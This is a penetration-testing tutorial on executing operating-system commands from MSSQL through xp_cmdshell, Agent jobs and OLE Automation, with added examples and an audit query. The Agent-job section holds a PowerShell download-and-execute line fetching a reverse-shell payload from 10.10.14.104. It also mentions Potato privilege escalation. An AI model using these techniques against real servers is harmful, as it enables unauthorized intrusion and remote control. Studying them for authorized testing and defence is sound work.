3. Command Execution

MSSQL server enumeration and exploitation series

🧨 Command Execution Methods

MSSQL Server provides several ways to execute system-level commands, which attackers or penetration testers may leverage for post-exploitation. These include:

  1. Using xp_cmdshell
  2. Creating malicious SQL Server Agent Jobs
  3. Leveraging OLE Automation Procedures

⚠️ Important: These features are disabled by default for security reasons. Turning them on through sp_configure requires the ALTER SETTINGS server permission, which members of the sysadmin (and serveradmin) fixed server roles hold implicitly; in practice you need sysadmin to both enable and use them. For xp_cmdshell and OLE Automation the first step is exposing the advanced options, otherwise sp_configure reports that the option "does not exist, or it may be an advanced option":

      EXEC sp_configure 'show advanced options', 1;
      RECONFIGURE;

✅ Requirements

To perform command execution in MSSQL Server:

  • You must have sysadmin privileges to enable advanced options or run high-privileged features.
  • The instance must still allow those features to be enabled: xp_cmdshell, Agent Jobs, or OLE Automation.
  • Check that the target instance has not been hardened. Production servers frequently keep these options off, restrict who can flip them (for example with a Policy-Based Management policy or a DDL trigger), or run the service under a low-privileged account so that enabling them gains little.
  • For Agent Jobs: the SQL Server Agent service must be running.

1. 🚀 Command Execution via xp_cmdshell

xp_cmdshell is a built-in extended stored procedure (it lives in master) that executes a command string through cmd.exe and returns the command's output to the T-SQL caller as a result set.

  • ⚙️ Requirements
    • sysadmin privileges
    • xp_cmdshell must be enabled
  • 🧱 Steps to Enable xp_cmdshell

      -- 'show advanced options' must be on before xp_cmdshell is visible to sp_configure
      EXEC sp_configure 'show advanced options', 1;
      RECONFIGURE;
      EXEC sp_configure 'xp_cmdshell', 1;
      RECONFIGURE;

  • ▶️ Usage Example

      EXEC xp_cmdshell 'ipconfig';

    The output comes back as a single-column result set, one row per line of stdout, terminated by a NULL row.

    This spawns a cmd.exe process as a child of the sqlservr.exe process.

    When the caller is a sysadmin, the command runs under the SQL Server service account (e.g., NT AUTHORITY\SYSTEM, a virtual account such as NT Service\MSSQLSERVER, or a custom domain service account). A non-sysadmin login that has been granted EXECUTE on xp_cmdshell instead runs under the proxy credential configured with sp_xp_cmdshell_proxy_account, and fails if none is configured.

  • 🧹 Cleanup:

    To disable it again after use:

      EXEC sp_configure 'xp_cmdshell', 0;
      RECONFIGURE;
      EXEC sp_configure 'show advanced options', 0;
      RECONFIGURE;
    
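As an added example (not code from the original post), the following T-SQL wraps the enable / run / disable sequence above so that it records the instance's prior state and restores exactly that afterwards, and captures the command output in a table variable instead of letting it scroll past. It assumes a sysadmin login; the command run (whoami /all) and the table variable are illustrative choices.

```sql
-- Added example (not from the original post): run one command through xp_cmdshell
-- while recording and restoring the instance's prior configuration state.
-- Assumes a sysadmin login; the command and the table variable are illustrative.
SET NOCOUNT ON;

IF IS_SRVROLEMEMBER('sysadmin') <> 1
BEGIN
    RAISERROR('Caller is not sysadmin; xp_cmdshell cannot be enabled or (by default) executed.', 16, 1);
    RETURN;
END;

-- sys.configurations exposes the current (value_in_use) state of every sp_configure option
DECLARE @adv_was_on bit = (SELECT CAST(value_in_use AS bit) FROM sys.configurations
                           WHERE name = N'show advanced options');
DECLARE @xp_was_on  bit = (SELECT CAST(value_in_use AS bit) FROM sys.configurations
                           WHERE name = N'xp_cmdshell');

IF @xp_was_on = 0
BEGIN
    IF @adv_was_on = 0
    BEGIN
        EXEC sp_configure 'show advanced options', 1;
        RECONFIGURE;
    END;
    EXEC sp_configure 'xp_cmdshell', 1;
    RECONFIGURE;
END;

-- Capture stdout in a table variable; the trailing NULL row is filtered out below
DECLARE @out TABLE (line_no int IDENTITY(1,1), line nvarchar(4000));
INSERT INTO @out (line) EXEC xp_cmdshell 'whoami /all';
SELECT line_no, line FROM @out WHERE line IS NOT NULL ORDER BY line_no;

-- Restore what was there before rather than unconditionally disabling
IF @xp_was_on = 0
BEGIN
    EXEC sp_configure 'xp_cmdshell', 0;
    RECONFIGURE;
    IF @adv_was_on = 0
    BEGIN
        EXEC sp_configure 'show advanced options', 0;
        RECONFIGURE;
    END;
END;
```

Restoring the recorded state matters more than it looks: on an instance where xp_cmdshell was already on, the post's cleanup block would switch it off and change the server's behaviour for whoever was legitimately using it.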

2. 🧨 Command Execution via SQL Server Agent Jobs

SQL Server Agent Jobs are scheduled tasks used to automate database operations. If the SQL Server Agent service is running, jobs can be abused to execute arbitrary commands.

  • 🧱 Requirements
    • SQL Server Agent service must be running.
    • User must have sysadmin rights.
  • 🧪 Normal Agent Job

    A minimal job definition. sp_add_jobstep only registers the step; until the job is also targeted at a server with sp_add_jobserver (as in the full example that follows) the Agent will never run it:

      USE msdb;
      EXEC dbo.sp_add_job @job_name = N'MyJob';
      EXEC sp_add_jobstep
          @job_name = N'MyJob',
          @step_name = N'SampleStep',
          @subsystem = N'TSQL',
          @command = N'ALTER DATABASE SALES SET READ_ONLY';

  • 👷 Normal Job Creation Example

    A complete job named Weekly Sales Data Backup with one T-SQL step, a schedule that fires once at 23:30:00 (@freq_type = 1 means "once"; @active_start_time is an HHMMSS integer), and the target-server registration that makes the job runnable:

      USE msdb;
      EXEC sp_add_job @job_name = N'Weekly Sales Data Backup';
      EXEC sp_add_jobstep
          @job_name = N'Weekly Sales Data Backup',
          @step_name = N'Set DB ReadOnly',
          @subsystem = N'TSQL',
          @command = N'ALTER DATABASE SALES SET READ_ONLY',
          @retry_attempts = 5,
          @retry_interval = 5;          -- minutes between retries
      EXEC sp_add_schedule
          @schedule_name = N'RunOnce',
          @freq_type = 1,               -- 1 = run once
          @active_start_time = 233000;  -- 23:30:00
      EXEC sp_attach_schedule
          @job_name = N'Weekly Sales Data Backup',
          @schedule_name = N'RunOnce';
      EXEC sp_add_jobserver @job_name = N'Weekly Sales Data Backup';
  • 💥 Malicious Job using PowerShell Subsystem

    SQL Server Agent provides CmdExec and PowerShell job-step subsystems that execute operating-system commands and PowerShell scripts, respectively. Both run as the Agent service account (or a proxy account if one is configured for the step).

    You can create a SQL Server Agent job with a step that uses the PowerShell subsystem to download and execute a script hosted on your machine.

    Instead of scheduling the job, you can start it immediately using the sp_start_job stored procedure. sp_start_job returns as soon as the Agent has queued the job; it does not wait for the step to finish, so the outcome has to be read from msdb job history (or observed on the attacker's listener).

    To run a PowerShell script (e.g., for a reverse shell):

      USE msdb;
      EXEC sp_add_job @job_name = N'Malicious Job';
      EXEC sp_add_jobstep
          @job_name = N'Malicious Job',
          @step_name = N'Execute PowerShell Script',
          @subsystem = N'PowerShell',
          -- T-SQL string literals use single quotes; quotes inside the command are doubled
          @command = N'(New-Object Net.WebClient).DownloadString(''http://10.10.14.104/a'') | IEX;';
      EXEC sp_add_jobserver @job_name = N'Malicious Job';
      EXEC sp_start_job @job_name = N'Malicious Job';

    The remote file a would typically contain a PowerShell reverse shell payload. Note that the PowerShell subsystem runs the step inside the Agent's own PowerShell host (the sqlps utility with the SQLPS module loaded), not a full powershell.exe session; when a payload needs the normal Windows PowerShell environment, a CmdExec step that launches powershell.exe explicitly is the usual alternative.

    🚨 Security Note

    • SQL Server Agent often runs as NT SERVICE\SQLSERVERAGENT
    • This account typically holds SeImpersonatePrivilege, which can be escalated via “Potato” attacks to SYSTEM
  • 🧹 Cleanup:

      EXEC sp_delete_job @job_name = N'Malicious Job';


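The post shows only the PowerShell subsystem; the CmdExec subsystem it mentions works the same way. The following added example (not code from the original post) creates a CmdExec step with the Agent's own @output_file_name capture, starts it, polls msdb job history for the outcome, and reads the captured file back through OPENROWSET(BULK ...) so that xp_cmdshell is never needed. It assumes a sysadmin login, a running SQL Server Agent, and that the Agent service account can write to C:\Windows\Tasks; the job name, file path and command are illustrative.

```sql
-- Added example (not from the original post): the Agent-job technique with a CmdExec
-- step, the step's output captured to a file, and the result checked from T-SQL.
-- Assumes sysadmin, a running SQL Server Agent, and a writable C:\Windows\Tasks;
-- job name, path and command are illustrative.
USE msdb;
SET NOCOUNT ON;

-- Precondition: is the Agent running at all? (needs VIEW SERVER STATE; sysadmin has it)
SELECT servicename, status_desc, service_account
FROM   sys.dm_server_services
WHERE  servicename LIKE N'SQL Server Agent%';

DECLARE @job     sysname       = N'Ops Check';
DECLARE @outfile nvarchar(260) = N'C:\Windows\Tasks\ops_check.txt';

EXEC sp_add_job @job_name = @job;
EXEC sp_add_jobstep
    @job_name         = @job,
    @step_name        = N'Run command',
    @subsystem        = N'CmdExec',       -- runs as the Agent service account (or its proxy)
    @command          = N'whoami /all',
    @output_file_name = @outfile;         -- the Agent writes the step's stdout/stderr here
EXEC sp_add_jobserver @job_name = @job;   -- target the local server, otherwise it never runs

EXEC sp_start_job @job_name = @job;       -- asynchronous: returns immediately

-- Poll job history until step 1 has an outcome (run_status 1 = succeeded, 0 = failed)
DECLARE @status int = NULL, @tries int = 0;
WHILE @status IS NULL AND @tries < 20
BEGIN
    WAITFOR DELAY '00:00:01';
    SELECT TOP (1) @status = h.run_status
    FROM   msdb.dbo.sysjobhistory AS h
    JOIN   msdb.dbo.sysjobs       AS j ON j.job_id = h.job_id
    WHERE  j.name = @job AND h.step_id = 1
    ORDER  BY h.instance_id DESC;
    SET @tries += 1;
END;
SELECT @status AS run_status;

-- Read the captured output back without xp_cmdshell. OPENROWSET(BULK) needs a literal
-- path, reads as the SQL Server service account, and requires ADMINISTER BULK
-- OPERATIONS (held by sysadmin).
IF @status = 1
    SELECT BulkColumn AS step_output
    FROM   OPENROWSET(BULK 'C:\Windows\Tasks\ops_check.txt', SINGLE_CLOB) AS f;

-- Cleanup: remove the job together with its history rows
EXEC sp_delete_job @job_name = @job;
```

The @output_file_name capture is also the first thing to look at on the defensive side: a job step whose output lands in a world-writable directory is a cheap indicator that the Agent is being used as a command runner rather than for maintenance.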
3. 🎮 Command Execution via OLE Automation Procedures

OLE Automation Procedures expose Windows COM objects to T-SQL. The feature is disabled by default but can be enabled by a sysadmin through sp_configure.

It is driven by a small set of system stored procedures: sp_OACreate instantiates an object, sp_OAMethod calls a method on it, sp_OAGetProperty / sp_OASetProperty read and write its properties, sp_OAGetErrorInfo reports the last COM error, and sp_OADestroy releases the object.

These are the same COM objects that VBScript and JScript use, so anything scriptable from WScript is reachable from T-SQL.

For example, you can create a WScript.Shell object and execute arbitrary system commands directly from SQL Server.

  • ⚙️ Requirements
    • sysadmin privileges
    • OLE Automation must be enabled
  • ✅ Enabling OLE Automation

      EXEC sp_configure 'show advanced options', 1;
      RECONFIGURE;
      EXEC sp_configure 'ole automation procedures', 1;
      RECONFIGURE;

  • ▶️ Example Command Execution

      DECLARE @objShell INT;
      -- Instantiate WScript.Shell; the object token comes back in @objShell
      EXEC sp_OACreate 'WScript.Shell', @objShell OUTPUT;
      -- WScript.Shell.Run(command [, windowStyle, waitOnReturn]); NULL discards the return value
      EXEC sp_OAMethod @objShell, 'Run', NULL, 'cmd.exe /c "whoami > C:\Windows\Tasks\tmp.txt"';
      -- Release the COM object
      EXEC sp_OADestroy @objShell;

    • This will run whoami and save the output to a text file.
    • As written, Run returns immediately without waiting for the process (pass 0, 1 as the windowStyle and waitOnReturn arguments to hide the window and block until the command exits) and nothing comes back to the caller, so the technique suits cases where no direct output is needed and the file system is writable.
  • 🧠 Notes
    • Uses COM objects (the same ones VBScript scripts)
    • Commands are executed with the privileges of the SQL Server service account, i.e. the sqlservr.exe process
  • 🧹 Cleanup

      EXEC sp_configure 'ole automation procedures', 0;
      RECONFIGURE;
      EXEC sp_configure 'show advanced options', 0;
      RECONFIGURE;

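The page's example writes output to a file but never reads it back. The following added example (not code from the original post) closes that loop using the OLE Automation procedures alone: WScript.Shell.Run with waitOnReturn set so the batch blocks until the command exits, Scripting.FileSystemObject to read the file back, and the HRESULT of every call checked with sp_OAGetErrorInfo. It assumes sysadmin, that 'ole automation procedures' is already enabled, and a writable C:\Windows\Tasks; the command and file path are illustrative.

```sql
-- Added example (not from the original post): run a command through WScript.Shell,
-- wait for it to finish, then read its output back with Scripting.FileSystemObject,
-- checking each COM call's HRESULT. Assumes sysadmin, 'ole automation procedures'
-- already enabled, and a writable C:\Windows\Tasks; command and path are illustrative.
SET NOCOUNT ON;

DECLARE @hr int, @shell int, @fso int, @file int;
DECLARE @src varchar(255), @desc varchar(255);
DECLARE @path varchar(260)  = 'C:\Windows\Tasks\ole_out.txt';
DECLARE @cmd  varchar(1000) = 'cmd.exe /c "whoami /groups > ' + @path + ' 2>&1"';
DECLARE @output varchar(8000);

-- 1. WScript.Shell.Run(cmd, windowStyle = 0 (hidden), waitOnReturn = 1)
EXEC @hr = sp_OACreate 'WScript.Shell', @shell OUTPUT;
IF @hr = 0 EXEC @hr = sp_OAMethod @shell, 'Run', NULL, @cmd, 0, 1;
IF @hr <> 0
BEGIN
    -- sp_OAGetErrorInfo returns the source and description of the last COM error
    EXEC sp_OAGetErrorInfo @shell, @src OUTPUT, @desc OUTPUT;
    RAISERROR('WScript.Shell failed (hr=0x%x): %s - %s', 16, 1, @hr, @src, @desc);
END;
IF @shell IS NOT NULL EXEC sp_OADestroy @shell;

-- 2. FileSystemObject.OpenTextFile(path, ForReading = 1) returns a TextStream object;
--    an int OUTPUT variable receives its object token, then TextStream.ReadAll() the text
EXEC @hr = sp_OACreate 'Scripting.FileSystemObject', @fso OUTPUT;
IF @hr = 0 EXEC @hr = sp_OAMethod @fso, 'OpenTextFile', @file OUTPUT, @path, 1;
IF @hr = 0 EXEC @hr = sp_OAMethod @file, 'ReadAll', @output OUTPUT;
IF @hr <> 0
BEGIN
    EXEC sp_OAGetErrorInfo @fso, @src OUTPUT, @desc OUTPUT;
    RAISERROR('FileSystemObject failed (hr=0x%x): %s - %s', 16, 1, @hr, @src, @desc);
END;
IF @file IS NOT NULL EXEC sp_OADestroy @file;
IF @fso  IS NOT NULL EXEC sp_OADestroy @fso;

SELECT @output AS command_output;
```

Checking the return code of each sp_OA* call is not pedantry: these procedures do not raise T-SQL errors on COM failure, they only return a non-zero HRESULT, so without the checks a failed sp_OACreate silently leaves a NULL token and the later calls fail with a less useful message.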
🔒 Post-Exploitation Hygiene

After executing commands:

  • Disable features you’ve enabled (xp_cmdshell, OLE Automation)
  • Remove malicious jobs (sp_delete_job)
  • Audit logs and configuration
  • Check for spawned processes using tools like Sysinternals Process Explorer or PowerShell
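For the "audit logs and configuration" step, the following added T-SQL (not code from the original post) is one audit pass a defender or assessor can run to find the artefacts the three techniques above leave behind: the sp_configure options, explicit EXECUTE grants on xp_cmdshell, Agent job steps that leave the T-SQL subsystem, and the error-log lines written whenever sp_configure flips an option. It assumes a login with VIEW SERVER STATE and read access to master and msdb (sysadmin covers this); the error-log search string is an illustrative choice.

```sql
-- Added example (not from the original post): an audit pass for the three execution
-- paths (xp_cmdshell, Agent jobs, OLE Automation). Assumes VIEW SERVER STATE plus read
-- access to master and msdb; the search string in step 4 is illustrative.
USE master;
SET NOCOUNT ON;

-- 1. Which of the risky sp_configure options are on (configured value vs. value in use)?
SELECT name, CAST(value AS int) AS configured, CAST(value_in_use AS int) AS in_use
FROM   sys.configurations
WHERE  name IN (N'xp_cmdshell', N'Ole Automation Procedures', N'show advanced options');

-- 2. Who can reach xp_cmdshell outside sysadmin? Explicit EXECUTE grants live in master.
SELECT pr.name AS grantee, pe.permission_name, pe.state_desc
FROM   sys.database_permissions AS pe
JOIN   sys.database_principals  AS pr ON pr.principal_id = pe.grantee_principal_id
WHERE  pe.major_id = OBJECT_ID(N'sys.xp_cmdshell');

-- 3. Agent job steps running under CmdExec or PowerShell, with owner and creation date
SELECT j.name AS job_name, SUSER_SNAME(j.owner_sid) AS owner, s.step_id, s.subsystem,
       LEFT(s.command, 200) AS command_preview, s.output_file_name,
       j.date_created, j.enabled
FROM   msdb.dbo.sysjobs     AS j
JOIN   msdb.dbo.sysjobsteps AS s ON s.job_id = j.job_id
WHERE  s.subsystem IN (N'CmdExec', N'PowerShell')
ORDER  BY j.date_created DESC;

-- 4. Configuration flips are written to the SQL Server error log as
--    "Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE ..."
--    xp_readerrorlog args: log number (0 = current), log type (1 = SQL Server), search string
EXEC xp_readerrorlog 0, 1, N'Configuration option';
```

The error-log check is the one that survives an attacker's own cleanup: disabling xp_cmdshell again writes a second "changed from 1 to 0" line, so the enable/disable pair stays visible even after the option reads as off.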

📌 Summary Table For the used methods

  Method                   | Requires sysadmin | Needs extra config               | External service needed | Can run arbitrary commands
  -------------------------|-------------------|----------------------------------|-------------------------|---------------------------
  xp_cmdshell              | Yes               | Enable xp_cmdshell               | No                      | Yes
  Agent Job (CmdExec/PS)   | Yes               | SQL Server Agent running         | Yes (SQL Server Agent)  | Yes
  OLE Automation           | Yes               | Enable ole automation procedures | No                      | Yes

This post is licensed under CC BY 4.0 by the author.